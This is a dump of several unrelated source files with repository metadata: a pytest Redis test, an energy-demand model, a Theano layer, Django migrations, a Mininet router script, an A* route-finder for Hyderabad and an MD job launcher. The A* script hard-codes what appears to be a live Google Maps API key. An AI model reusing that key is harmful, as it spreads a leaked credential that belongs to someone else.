    py_test_args = get_args_for_backup_list(redis_args, back_up_list)
    for a_file in file_paths_to_test:
        redis_connection.lpush(redis_args['redis-list-key'],
                               a_file)
    for i in range(10):
        result = testdir.runpytest(*py_test_args)
        # `path` instead of `i`: the original comprehension shadowed the
        # loop counter, which was confusing (and a bug under Python 2's
        # leaking comprehension scope).
        result.stdout.fnmatch_lines([path + " PASSED" for path in file_paths_to_test])
    assert redis_connection.llen(back_up_list) == 2
    for a_file in file_paths_to_test:
        assert redis_connection.rpop(back_up_list) == a_file
| [
"samy.abidib@shopify.com"
] | samy.abidib@shopify.com |
e34ddccd94638c82612a301dcb783977751ee558 | 685038d4be188fa72e9dba1d2213a47ee3aa00a2 | /ECOS2021/Demands/Inputs/Surveys/A/S4/Jul_S4_A.py | 39db06fef88624a9f7eead973c903d14f3b922fc | [] | no_license | CIE-UMSS/Tradeoff-between-Installed-Capacity-and-Unserved-Energy | e5599e4e4ac60b97f0c4c57c5de95e493b1b5ac4 | 459f31552e3ab57a2e52167ab82f8f48558e173c | refs/heads/master | 2023-06-01T18:09:29.839747 | 2021-06-19T15:56:26 | 2021-06-19T15:56:26 | 343,720,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,963 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 31 14:33:07 2020
@author: alejandrosoto
Script for 2 class of household in Raqaypampa.
"""
# -*- coding: utf-8 -*-
"""
@author: Alejandro Soto
"""
from core import User, np
User_list = []
#User classes definition
HI = User("high income",1)
User_list.append(HI)
LI = User("low income",0)
User_list.append(LI)
'''
Base scenario (BSA): Indoor bulb (3), outdoor bulb (1), radio (1), tv (1), phone charger (2), Water Heater (1), Mixer (1)
Base scenario (B): Indoor bulb (3), outdoor bulb (1), radio (1), tv (1), phone charger (2)
A
Scenario 1: BSA + Fridge (1) + Freezer* (1).
Scenario 2: BSA + Fridge (1).
Scenario 3: BSA + Fridge (1)*.
Scenario 4: BSA + Freezer (1).
Scenario 5: BSA + Wheler (1).
Scerario 6: BSA + Grinder (1).
Scanerio 7: Add + Dryer (1),
Scenario 9: All
B
Scenario 8: BSB + Water Heater** (1).
Scenario 10: BSA + Pump Water (1).
Scenario 11: BSA + DVD (1).
Scenario 12: BSA + Blender (1).
Scenario 13: BSA + Iron (1).
Scerario 14: BSA + Mill (1).
* With seasonal variation
** Occasional use
Cold Months: May-Aug Std Cycle 8:00-18:00 Above 10 degrees
Warm Months: Jan-Apr Std Cycle 0:00-23:59 Above 10 degrees
Hot Nonths: Sep-Dec Std Cycle 0:00-10:00; 15:01-23:59 Above 10 degrees
Int Cycle 10:01-15:00
'''
#High-Income
#indoor bulb
HI_indoor_bulb = HI.Appliance(HI,3,7,1,320,0.6,190)
HI_indoor_bulb.windows([1080,1440],[0,0])
#outdoor bulb
HI_outdoor_bulb = HI.Appliance(HI,1,13,1,340,0.1,300)
HI_outdoor_bulb.windows([1100,1440],[0,0])
HI_Radio = HI.Appliance(HI,1,7,1,280,0.3,110)
HI_Radio.windows([420,708],[0,0])
#tv
HI_TV = HI.Appliance(HI,1,60,3,300,0.38,114)
HI_TV.windows([1140,1440],[651,1139],0.35,[300,650])
#phone charger
HI_Phone_charger = HI.Appliance(HI,2,5,3,250,0.4,95)
HI_Phone_charger.windows([1190,1440],[0,420],0.35,[421,1189])
#water_heater
HI_Water_heater = HI.Appliance(HI,1,150,1,60,0.05,30)
HI_Water_heater.windows([0,1440],[0,0])
#mixer
HI_Mixer = HI.Appliance(HI,1,50,1,10,0.5,5,occasional_use = 0.3)
HI_Mixer.windows([420,560],[0,0])
#freezer
HI_Freezer = HI.Appliance(HI,1,200,1,1440,0,30,'yes',3)
HI_Freezer.windows([0,1440],[0,0])
HI_Freezer.specific_cycle_1(200,20,5,10)
HI_Freezer.specific_cycle_2(200,15,5,15)
HI_Freezer.specific_cycle_3(200,10,5,20)
HI_Freezer.cycle_behaviour([600,900],[0,0],[0,0],[0,0],[0,599],[901,1440])
#Lower Income
#indoor bulb
LI_indoor_bulb = LI.Appliance(LI,3,7,2,287,0.4,124)
LI_indoor_bulb.windows([1153,1440],[0,300],0.5)
#outdoor bulb
LI_outdoor_bulb = LI.Appliance(LI,1,13,1,243,0.3,71)
LI_outdoor_bulb.windows([1197,1440],[0,0])
#radio
LI_Radio = LI.Appliance(LI,1,7,2,160,0.3,49)
LI_Radio.windows([480,840],[841,1200],0.5)
#TV
LI_TV = LI.Appliance(LI,1,100,3,250,0.3,74)
LI_TV.windows([1170,1420],[551,1169],0.3,[300,550])
#phone charger
LI_Phone_charger = LI.Appliance(LI,2,5,3,200,0.4,82)
LI_Phone_charger.windows([1020,1440],[0,420],0.3,[720,1019])
| [
"asm19971997@gmail.com"
] | asm19971997@gmail.com |
e25e5edb0703725283c9e674fc6085ad431c3b52 | ed4587c16e0708f0b618d8703b0ea9e86f5c3237 | /Layers/HiddenLayer.py | c0b7f6809f033afd968f23563e71d82e0f8955df | [] | no_license | CaoDuyThanh/NN_Autoencoder | b85256e4c4a1a71072c876c45098606244966cf8 | 0a0fc8e23e39249c6562249cf538e3b5898037f5 | refs/heads/master | 2021-01-23T22:15:06.380045 | 2017-02-26T13:33:50 | 2017-02-26T13:33:50 | 83,121,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,858 | py | import theano
import numpy
import cPickle
import theano.tensor as T
from theano.tensor.shared_randomstreams import RandomStreams
class HiddenLayer:
    """Fully connected Theano layer with optional denoising-style input corruption.

    Bug fix in Output(): the original corrupted ``self.Input`` in place but
    then computed the affine transform from the *pre-corruption* local copy,
    so the corruption never affected the output — and ``self.Input`` was
    destructively overwritten as a side effect.  Corruption is now applied
    to the value actually used, without mutating ``self.Input``.
    """

    def __init__(self,
                 rng,                   # random seed source (numpy RandomState)
                 input,                 # symbolic data input
                 numIn,                 # number of neurons feeding this layer
                 numOut,                # number of neurons this layer outputs
                 activation=T.tanh,     # activation function (None = linear layer)
                 W=None,                # optional pre-built weight shared variable
                 b=None,                # optional pre-built bias shared variable
                 corruption=None):      # corruption level in [0, 1], or None
        # Store configuration
        self.Rng = rng
        self.Input = input
        self.NumIn = numIn
        self.NumOut = numOut
        self.Activation = activation
        self.Corruption = corruption

        # Create shared parameters for the layer
        if W is None:
            # Random weights, uniform in [-wBound, wBound]
            # (Glorot-style bound based on fan-in + fan-out).
            wBound = numpy.sqrt(6.0 / (self.NumIn + self.NumOut))
            self.W = theano.shared(
                numpy.asarray(
                    rng.uniform(
                        low=-wBound,
                        high=wBound,
                        size=(self.NumIn, self.NumOut)
                    ),
                    dtype=theano.config.floatX
                ),
                borrow=True
            )
        else:
            # Reuse externally supplied weights (e.g. tied autoencoder weights).
            self.W = W

        if b is None:
            # Zero-initialized bias vector.
            self.b = theano.shared(
                numpy.zeros(
                    shape=(self.NumOut,),
                    dtype=theano.config.floatX
                ),
                borrow=True
            )
        else:
            self.b = b

    def getCorruptedInput(self, input, corruptionLevel):
        """Zero out each element of *input* with probability *corruptionLevel*."""
        theano_rng = RandomStreams(self.Rng.randint(2 ** 30))
        return theano_rng.binomial(size=input.shape, n=1,
                                   p=1 - corruptionLevel,
                                   dtype=theano.config.floatX) * input

    def Output(self):
        """Symbolic output: activation(dot(corrupted_input, W) + b)."""
        input = self.Input
        if self.Corruption is not None:
            # Apply corruption to the value actually used (see class docstring).
            input = self.getCorruptedInput(input, self.Corruption)
        output = T.dot(input, self.W) + self.b
        if self.Activation is None:
            return output
        return self.Activation(output)

    def WTranspose(self):
        """Return the transpose of the weight matrix (for tied decoders)."""
        return self.W.T

    def Params(self):
        """Trainable parameters of the layer."""
        return [self.W, self.b]

    def LoadModel(self, file):
        """Load W then b (in that order) from an open cPickle stream."""
        self.W.set_value(cPickle.load(file), borrow=True)
        self.b.set_value(cPickle.load(file), borrow=True)
"caoduythanhcantho@gmail.com"
] | caoduythanhcantho@gmail.com |
ea5aa679209b5f87452309f4ae5d2b6780c1cbc6 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5634697451274240_0/Python/elsw/revenge_pancakes.py | 5b7acca8e7d41f5d660ecf7e2208da6c469f5d79 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | #/usr/bin/env python
# Google Code Jam Qualification Round 2016
# B. Revenge of the Pancakes
# https://code.google.com/codejam/contest/6254486/dashboard#s=p1
def happy(stack):
    """Return the flips needed to make every pancake happy-side ('+') up.

    Appending a sentinel '+' reduces the answer to the number of adjacent
    sign changes: each maximal run of equal signs before the final '+'
    run costs exactly one flip.
    """
    padded = stack + '+'
    return sum(1 for left, right in zip(padded, padded[1:]) if left != right)
# Contest harness (Python 2: xrange): read the case count, then one stack
# per line, writing "Case #k: <flips>" per case to test.out.
with open('B-small-attempt0.in', 'r') as f:
    t = int(f.readline())
    with open('test.out', 'w') as g:
        for i in xrange(t):
            stack = f.readline().strip()
            g.write('Case #%d: %d\n' % (i+1, happy(stack)))
| [
"alexandra1.back@gmail.com"
] | alexandra1.back@gmail.com |
fb7a9b2ad58dbbac6198ce33d39b861c5eaa39e5 | 0e09aa91ecfd3dcdfa1faf17a3a76bc5ba53a1a0 | /raterapp/apps.py | 34501b748a4802d536e1fce228bbbe98ff2a10ae | [] | no_license | MatthewSingler/rater-server | 39a25e538962f96688785d53c6828d2a4689d13f | 4c81f035d6951d2b9f2fd55f9005fbb735ea6e4e | refs/heads/main | 2023-09-02T14:19:52.040205 | 2021-11-10T19:37:19 | 2021-11-10T19:37:19 | 423,614,609 | 0 | 0 | null | 2021-11-10T19:37:20 | 2021-11-01T20:59:32 | Python | UTF-8 | Python | false | false | 148 | py | from django.apps import AppConfig
class RaterappConfig(AppConfig):
    """Django application configuration for the `raterapp` app."""
    # Default to 64-bit auto-incrementing primary keys for this app's models.
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'raterapp'
| [
"matthew.singler@gmail.com"
] | matthew.singler@gmail.com |
75994678cac4372a1f4b8c6364f38c95135e24d0 | 21644787e5f1101c9e4af52c0879e3625fe58b92 | /productos/migrations/0001_initial.py | d90c43acae9a3bc345982d67b4c5f4530d240d8c | [] | no_license | marta3/PaginaDjango | 1489d689179a89eea1b273ae6aabf855cc590fce | c8567f9204269c685e2eb17fb7506254b24a560a | refs/heads/master | 2022-11-06T03:44:48.503901 | 2018-02-21T11:01:36 | 2018-02-21T11:01:36 | 122,324,465 | 0 | 1 | null | 2022-10-28T13:17:15 | 2018-02-21T10:53:43 | Python | UTF-8 | Python | false | false | 2,226 | py | # Generated by Django 2.0 on 2018-02-14 08:28
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration for the `productos` app.

    Creates the `pedidos` (orders), `Perfiles` (profiles) and `Productos`
    (products) models, then links orders to products (M2M) and to the
    configured user model (FK).  Generated by Django — avoid hand-editing
    operations once the migration has been applied.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Orders: fields are added below via AddField once the referenced
        # models exist.
        migrations.CreateModel(
            name='pedidos',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        # One-to-one user profile with contact details.
        migrations.CreateModel(
            name='Perfiles',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('usuario', models.CharField(max_length=30)),
                ('direccion', models.CharField(blank=True, max_length=50)),
                ('fecha_nacimiento', models.DateField(blank=True, null=True)),
                ('telefono', models.CharField(max_length=20)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Product catalogue with a fixed category choice set.
        migrations.CreateModel(
            name='Productos',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nombre', models.CharField(max_length=100)),
                ('descripcion', models.CharField(max_length=150)),
                ('precio', models.IntegerField()),
                ('foto', models.ImageField(default='fotos/fotico.png', upload_to='fotos/')),
                ('categoria', models.CharField(choices=[('Postre', 'Postre'), ('Comidas', 'Comidas'), ('Bebidas', 'Bebidas')], default='Comidas', max_length=10)),
            ],
        ),
        migrations.AddField(
            model_name='pedidos',
            name='id_prod',
            field=models.ManyToManyField(to='productos.Productos'),
        ),
        migrations.AddField(
            model_name='pedidos',
            name='nom_usu',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"martaab1997@gmail.com"
] | martaab1997@gmail.com |
9c53ab1aae60600743db9747d0c63fc33815b1d3 | 32809f6f425bf5665fc19de2bc929bacc3eeb469 | /src/0435-Non-overlapping-Intervals/0435.py | 7ead2f6d87451d06255ac7a691c7621aab8a49fb | [] | no_license | luliyucoordinate/Leetcode | 9f6bf01f79aa680e2dff11e73e4d10993467f113 | bcc04d49969654cb44f79218a7ef2fd5c1e5449a | refs/heads/master | 2023-05-25T04:58:45.046772 | 2023-05-24T11:57:20 | 2023-05-24T11:57:20 | 132,753,892 | 1,575 | 569 | null | 2023-05-24T11:57:22 | 2018-05-09T12:30:59 | C++ | UTF-8 | Python | false | false | 533 | py | class Solution:
def eraseOverlapIntervals(self, intervals: List[List[int]]) -> int:
intervals.sort(key=lambda x: x[0])
result, pre = 0, None
for cur in intervals:
if prev and prev[1] > cur[0]:
result += 1
if cur[1] < prev[1]:
prev = cur
else:
prev = cur
return result
# Ad-hoc smoke run on the LeetCode 435 sample input.
if __name__ == "__main__":
    intervals = [[1,2], [2,3], [3,4], [1,3]]
print(Solution().eraseOverlapIntervals(intervals)) | [
"luliyucoordinate@outlook.com"
] | luliyucoordinate@outlook.com |
4a1a2aa093ea9f5082e68fb215190fec44f67e96 | b88ddf1bbc0e203b403584428078d73593715454 | /builder/igloo_director.py | ea3e87cb018003a80ebf063c557b4af64e4ccf29 | [] | no_license | keys4words/designPatterns | ef28289a92d68652f3d34a9a609aebe986e785bb | 0d6ebd5dc1f8c3be725f7405bb785436eec37a89 | refs/heads/main | 2023-04-15T01:15:27.231107 | 2021-04-20T13:31:25 | 2021-04-20T13:31:25 | 348,728,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | from house_builder import HouseBuilder
class IglooDirector:
    """Director in the Builder pattern: drives HouseBuilder through the
    fixed sequence of steps that produces an igloo."""

    @staticmethod
    def construct():
        # Run the builder through each configuration step, then return
        # the finished product.
        igloo_builder = (HouseBuilder()
                         .set_building_type("Igloo")
                         .set_wall_material("Ice")
                         .set_number_doors(1))
        return igloo_builder.get_result()
"keys4words@gmail.com"
] | keys4words@gmail.com |
924e843bf762ca9d9e88f6d17f4e35920d84013f | 4bb6a8cbd7ac887ec4abc6abc97f0cb17415e82d | /Chapter 5 Strings/numbers2text.py | 7d27d3705f77296072ca8408e9a44d5c200e6e9c | [] | no_license | jbhennes/CSCI-220-Programming-1 | cdc9cab47b4a79dccabf014224a175674e9a7155 | ac9e85582eeb51a205981674ffdebe8a5b93a205 | refs/heads/master | 2021-01-01T03:54:50.723923 | 2016-05-02T16:06:55 | 2016-05-02T16:06:55 | 57,902,553 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | # numbers2text.py
# A program to convert a sequence of ASCII numbers into
# a string of text.
import string # include string library for the split function.
def main():
print "This program converts a sequence of ASCII numbers into"
print "the string of text that it represents."
print
# Get the message to encode
inString = raw_input("Please enter the ASCII-encoded message: ")
# Loop through each substring and build ASCII message
message = ""
for numStr in string.split(inString):
asciiNum = eval(numStr) # convert digits to a number
message = message + chr(asciiNum) # append character to message
print "The decoded message is:", message
# Run only when executed as a script, not when imported as a module.
if __name__ == '__main__':
    main()
| [
"jbhennes@g.cofc.edu"
] | jbhennes@g.cofc.edu |
c7e010d1c4eff67c8129a08d22beac7d0f912f78 | 8ed876f84db919231bfeff0632958668d9ab8f65 | /P4_Subnet/im_legacy_router.py | 805e26d9b59866a8897ed4e6f842823ae388c975 | [] | no_license | nayelimdejesus/CST311 | 6268763ce28bf901ef9425e71dce672d0c8d2cda | d4306714d62a4d4738f56572e3a575ce15c0f792 | refs/heads/master | 2022-11-23T13:12:33.843475 | 2020-08-02T04:06:36 | 2020-08-02T04:06:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,839 | py | #!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Host, Node
from mininet.cli import CLI
from mininet.log import setLogLevel, info
from mininet.topo import Topo
def myNetwork():
    """Build and run a two-subnet Mininet topology joined by one legacy router."""
    # Start from an empty topology; nothing is built until build() below.
    network = Mininet(topo=None, build=False, ipBase='0.0.0.0')

    info('*** Adding controller\n')
    info('*** Add switches\n')
    # The "router" is a plain Node with kernel IP forwarding enabled.
    # Its primary interface sits on the 192.168.1.0/24 subnet.
    router = network.addHost('r1', cls=Node, ip='192.168.1.1/24')
    # Turn on IPv4 forwarding inside the router's namespace.
    router.cmd('sysctl -w net.ipv4.ip_forward=1')

    info('*** Add hosts\n')
    # One host per subnet; each sends off-subnet traffic via the router.
    host_one = network.addHost('h1', ip='192.168.1.100/24', defaultRoute='via 192.168.1.1')
    host_two = network.addHost('h2', ip='192.168.2.100/24', defaultRoute='via 192.168.2.1')

    info('*** Add links\n')
    # Give the router a dedicated interface (and address) per host link.
    network.addLink(host_one, router, intfName2='r0-eth1', params2={'ip': '192.168.1.1/24'})
    network.addLink(host_two, router, intfName2='r0-eth2', params2={'ip': '192.168.2.1/24'})

    info('*** Starting network\n')
    network.build()
    # Hand control to the interactive Mininet CLI until the user exits.
    CLI(network)
    network.stop()
# Entry point: raise Mininet log verbosity so the info() progress messages
# above are printed, then construct and run the topology.
if __name__ == '__main__':
    setLogLevel( 'info' )
    myNetwork()
"ric3639@gmail.com"
] | ric3639@gmail.com |
2d27cfa1235bef09f4adf5a230773fdd5de73250 | 0ba8030da93038bf799e94178e417721ec0a2c77 | /A_star-Algorithm.py | cf37e192d7aa26b10c68a51802825f9c9416335f | [] | no_license | stgstg27/Optimal-Path-in-Hyderabad | a09bb1bd3e78c28961d67e03dfbe4b4a7c1c8f4c | 48681a07626610b3dd026b95c3f1d87531e43d3b | refs/heads/master | 2021-04-07T02:24:44.338940 | 2018-03-15T00:40:25 | 2018-03-15T00:40:25 | 125,290,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,432 | py | ####################################################################
##### Finding path using A* Algorithm and Graph ############
##### Artificial Intelligence (CS F407) ############
##### @author: Saurabh,Akhil ############
####################################################################
import pickle
from heapq import heappush,heappop
from geopy.distance import vincenty
import pandas as pd
import gmplot
import numpy as np
import requests
import json
import re
print('Importing Libraries.............')
print ('Loading Adjancency Matrix......')
# Load the precomputed adjacency (edge-distance) matrix of the road graph.
with open('adj_mat.pkl','rb') as fp:
    a=pickle.load(fp)
df = pd.read_csv('cordinates.csv') #Reading LATITUDE AND LONGITUDE DATASET CSV File()
# A* bookkeeping: open1 holds (f-score, node) pairs and is kept sorted like a
# priority queue; open2 mirrors just the node ids for membership tests;
# closed collects (node, f-score) pairs already expanded.
open1=[]# Priority Queue ::Queue of pair of Nodeid and their correspoding score accoring to A* Algorithm
open2=[]
closed=[]# List of pair of Nodeid and their correspoding score accoring to A* Algorithm
#f = g+h
''''
Starting Destination :
start_dest
'''
start_dest=6
''''
Ending Destination :
end_dest
'''
end_dest=1
# Number of nodes in the graph (rows of the adjacency matrix).
len_listofplaces=len(a)
def compdis(loc1, loc2):
    '''
    Heuristic distance between two graph nodes.

    Parameters:-
            loc1(int): node id of the first location (row index in df)
            loc2(int): node id of the second location
    Returns
            float: geodesic (Vincenty) distance between the two points,
            in miles
    '''
    # Look up each node's coordinates and build (lat, lon) tuples;
    # float() unwraps the pandas/numpy scalars.
    point_a = (float(df.iloc[loc1]['latitude']), float(df.iloc[loc1]['longitude']))
    point_b = (float(df.iloc[loc2]['latitude']), float(df.iloc[loc2]['longitude']))
    return vincenty(point_a, point_b).miles
def trace_path(closed,start_dest,end_dest):
    '''
    Walk the closed list backwards from end_dest to reconstruct the path.

    Parameters:-
            closed(list): (node_id, f_score) pairs expanded by A*, in the
                          order they were closed; this list is consumed
                          (mutated) by the loop below.
            start_dest(int): node id of the starting location
            end_dest(int): node id of the ending location
    Returns
            path(list) : node ids of the solution path (end -> start order)
            lat(list)  : latitudes of the path nodes, same order
            lon(list)  : longitudes of the path nodes, same order
    '''
    print (closed[len(closed)-1])
    lat = []
    lon = []
    # `prev` is the most recently accepted path node; start from the goal.
    prev = end_dest
    lat.append(df.iloc[end_dest]['latitude'])
    lon.append(df.iloc[end_dest]['longitude'])
    path = []
    path.append(end_dest)
    while len(closed)>0:
        l = len(closed)
        # Inspect the most recently closed node first.
        curr , temp = closed[l-1]
        if curr == start_dest:
            path.append(curr)
            lat.append(df.iloc[curr]['latitude'])
            lon.append(df.iloc[curr]['longitude'])
            break
        #print (prev,curr)
        # Accept `curr` only if an edge connects it to the previous node.
        if a[prev][curr]>0:
            if l >=2:
                prev2,temp2 = closed[l-2]
                # Skip `curr` when the next-older closed node offers a
                # shorter connection (avoids detours through siblings).
                if a[prev2][curr] < a[prev][prev2]:
                    closed.remove((curr,temp))
                    continue
            path.append(curr)
            lat.append(df.iloc[curr]['latitude'])
            lon.append(df.iloc[curr]['longitude'])
            prev = curr
            closed.remove((curr,temp))
        else:
            # Not adjacent to the path tip: discard and keep scanning.
            closed.remove((curr,temp))
    return path,lat,lon
def timefunc(y,i):
    '''
    Query the Google Distance Matrix API for travel info between two nodes.

    Parameters:-
            y(int): node id of the starting location
            i(int): node id of the ending location
    Returns
            int: driving time from y to i, in whole minutes
    '''
    start_dest=y
    end_dest=i
    start_lat = df.iloc[start_dest]['latitude']
    start_lon = df.iloc[start_dest]['longitude']
    end_lat = df.iloc[end_dest]['latitude']
    end_lon = df.iloc[end_dest]['longitude']
    # SECURITY NOTE: this API key should be loaded from configuration or an
    # environment variable, not hard-coded (and committed) in source.
    key = 'AIzaSyBX13dsWgRGx5IDZPCq6JkJj6ud6qQm7EY'
    URL = 'https://maps.googleapis.com/maps/api/distancematrix/json?units=metric&origins='
    URL = URL + str(start_lat)+ ',' + str(start_lon) + '&destinations=' + str(end_lat)+ ',' + str(end_lon) + '&key=' + key
    data = requests.get(URL).text
    json_data = json.loads(data)
    obj = json_data['rows'][0]['elements'][0]
    print('distance', obj['distance']['text'])
    print('time', obj['duration']['text'])
    # BUG FIX: the old code regex-scanned duration['text'] and returned the
    # FIRST number found, so "1 hour 5 mins" yielded 1.  The API already
    # supplies duration['value'] in seconds; convert that to minutes.
    return int(round(obj['duration']['value'] / 60.0))
'''
Adding the current path
'''
open1.append((compdis(start_dest,end_dest),start_dest))
g = np.zeros(len(a),dtype = np.float64)
total_time = np.zeros(len(a))
open2.append(start_dest)
path = []#Final Path
lat = []#list of latitudes
lon = []#list of longitudes
g[start_dest] = 0
total_time[start_dest] = 0
while len(open1)>0:
x,y = open1.pop()
#print (y)
if y==end_dest:
print ('Path Found');
path,lat,lon = trace_path(closed,start_dest,end_dest)#tracing path
break
else:
for i in range(len_listofplaces):
if a[y][i]!=0:
if i in open2: #Child is in open
for u,j in open1:
if j == i:
if u >(g[y] + a[y][i]+compdis(i,end_dest)):
open1.remove((u,j))
g[i] = g[y] + a[y][i] #Increasing g
#total_time[i] = total_time[y] + float(timefunc(y,i)) #calculating total time
open1.append(((g[i]+compdis(i,end_dest)),i)) #f = g + h(compdis)
else:
break
elif i in closed: #Child is in closed
for j in closed:
if j[0] == i:
if j[1]>(g[y] + a[y][i]+compdis(i,end_dest)):
closed.remove(j)
g[i] = g[y] + a[y][i] #Increasing g
#total_time[i] = total_time[y] + timefunc(y,i) #calculating total time
open1.append(((g[i]+compdis(i,end_dest)),i)) #f = g + h(compdis)
#heappush(open1,(a[y][i]+compdis(i,end_dest)))
open2.append(i)
else:
break
else: #Child is not open nor closed
g[i] = g[y] + a[y][i] #Increasing g
#total_time[i] = total_time[y] + timefunc(y,i) #calculating total time
open1.append(((g[i]+compdis(i,end_dest)),i)) #f = g + h(compdis)
#heappush(open1,(a[y][i]+compdis(i,end_dest)))
open2.append(i)
'''
Sorting the queue based on its score
'''
open1 = sorted(open1,reverse = True)
#print (open1)
closed.append((y,x)) #Considered Nodes goes into CLosed
#x = timefunc(start_dest,end_dest)
timefunc(start_dest,end_dest) # Calculating the total time
'''
Code Snippet to Map Solution on google maps
'''
gmap = gmplot.GoogleMapPlotter((lat[0]+lat[-1])/2, (lon[0]+lon[-1])/2, 12)
gmap.plot(lat, lon, 'cornflowerblue', marker=False, edge_width=7)
gmap.scatter(lat, lon, '#4444aa', size=180, marker=False)
gmap.scatter(lat, lon, '#FF0000', size=60, marker=True, c=None, s=None)
gmap.draw('map.html')
print (path)
| [
"noreply@github.com"
] | stgstg27.noreply@github.com |
832e473b8c911f7063df943d58fecbe31724ce10 | 2868a3f3bca36328b4fcff5cce92f8adeb25b033 | /+200ns/Ni_default/step1_dc/set.py | 23f82640e2dddefec72eb6201e99726773cd9099 | [] | no_license | linfranksong/TM-enzyme_input | 1c2a5e12e69c48febd5b5900aa00fe2339d42298 | 6e46a5b2c451efb93761707b77917a98ca0bfedc | refs/heads/master | 2022-03-19T19:49:09.373397 | 2019-12-04T00:11:59 | 2019-12-04T00:11:59 | 205,220,795 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,114 | py | import os
# Batch job generator for umbrella-sampling MD windows: for each force
# constant `a`, copies a template directory, fills the XXX/MMM/NNN/PPP
# placeholders in the input/PBS files via sed, and submits the first job.
# NOTE(review): `dir` shadows the builtin of the same name, and os.system
# with interpolated shell strings assumes trusted inputs -- both left
# unchanged here.
dir = os.path.dirname(os.path.realpath(__file__)) + '/'
for a in [150,200,250,300,350,400,450,500,550,600]:
#for a in [150]:
#for a in [200,250,300,350,400,450,500,550,600]:
    # Fresh working directory <a>_dc from the template, with MMM -> a.
    os.system("rm -r %s_dc"%(a))
    os.system("cp -r temp/ %s_dc"%(a))
    adir=dir+ "%s_dc/"%(a)
    os.chdir(adir)
    os.system("sed -i 's/MMM/%s/g' */*pbs"%(a))
    # Lambda-style window values; endpoints 0 and 1.0 are handled specially.
    array= [0,0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078,1.0]
    for n in range(1,len(array)-1):
        i=array[n]
        os.system("rm -r %s"%(i))
        os.system("cp -r files %s"%(i))
        wdir=adir+"%s/"%(i)
        os.chdir(wdir)
        # XXX -> this window's value; NNN/PPP -> neighbouring windows.
        os.system("mv eq.in %s_eq.in"%(i))
        os.system("mv us.in %s_us.in"%(i))
        os.system("sed -i 's/XXX/%s/g' %s_eq.in"%(i,i))
        os.system("sed -i 's/XXX/%s/g' %s_us.in"%(i,i))
        os.system("sed -i 's/MMM/%s/g' dis.RST"%(a))
        os.system("mv eq.pbs %s_eq.pbs"%(i))
        os.system("mv us.pbs %s_us.pbs"%(i))
        os.system("sed -i 's/XXX/%s/g' *.pbs"%(i))
        os.system("sed -i 's/NNN/%s/g' *.pbs"%(array[n+1]))
        os.system("sed -i 's/PPP/%s/g' *.pbs"%(array[n-1]))
        os.chdir(adir)
    # Window 0: seeded from the previous FEP step's restart file, then
    # submitted to the scheduler.
    sdir=adir+"0/"
    os.chdir(sdir)
    i=0
    os.system("cp /mnt/gs18/scratch/users/songlin3/run/glx-0904/+200ns/Ni_default/step0_fep/%s_fep/1.0/%s_1.0_eq_center.rst ."%(a,a))
    os.system("mv eq.in %s_eq.in"%(i))
    os.system("mv us.in %s_us.in"%(i))
    os.system("sed -i 's/XXX/%s/g' %s_eq.in"%(i,i))
    os.system("sed -i 's/XXX/%s/g' %s_us.in"%(i,i))
    os.system("mv eq.pbs %s_eq.pbs"%(i))
    os.system("mv us.pbs %s_us.pbs"%(i))
    os.system("sed -i 's/XXX/%s/g' *.pbs"%(i))
    os.system("sed -i 's/MMM/%s/g' dis.RST"%(a))
    os.system("sbatch 0_eq.pbs")
    # Window 1.0: prepared but not submitted here.
    sdir=adir+"1.0/"
    os.chdir(sdir)
    i=1.0
    os.system("mv eq.in %s_eq.in"%(i))
    os.system("mv us.in %s_us.in"%(i))
    os.system("sed -i 's/XXX/%s/g' %s_eq.in"%(i,i))
    os.system("sed -i 's/XXX/%s/g' %s_us.in"%(i,i))
    os.system("mv eq.pbs %s_eq.pbs"%(i))
    os.system("mv us.pbs %s_us.pbs"%(i))
    os.system("sed -i 's/XXX/%s/g' *.pbs"%(i))
    os.system("sed -i 's/MMM/%s/g' dis.RST"%(a))
    os.system("sed -i 's/MMM/%s/g' center.in"%(a))
    os.chdir(dir)
| [
"songlin3@msu.edu"
] | songlin3@msu.edu |
6c42099ea62524284bf62ff510f59295cb222627 | 9de93d7a5f6bb6b21e729e569acd834765988212 | /py-manage-server/role_manager.py | 7f17cf52b930fc3a0ce039dc199222149e12ec88 | [
"Apache-2.0"
] | permissive | dkoudlo/py-manage-server | 50e14ea33313bdb6d9700bd82eb67aad97ad32cb | 812af40f94188df76dec085f85d958a5d83cd2ed | refs/heads/master | 2021-01-15T10:59:42.140783 | 2016-10-17T21:29:20 | 2016-10-17T21:29:20 | 68,629,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | import config_file_manager
# get all roles
# returns a dictionary
def get_roles():
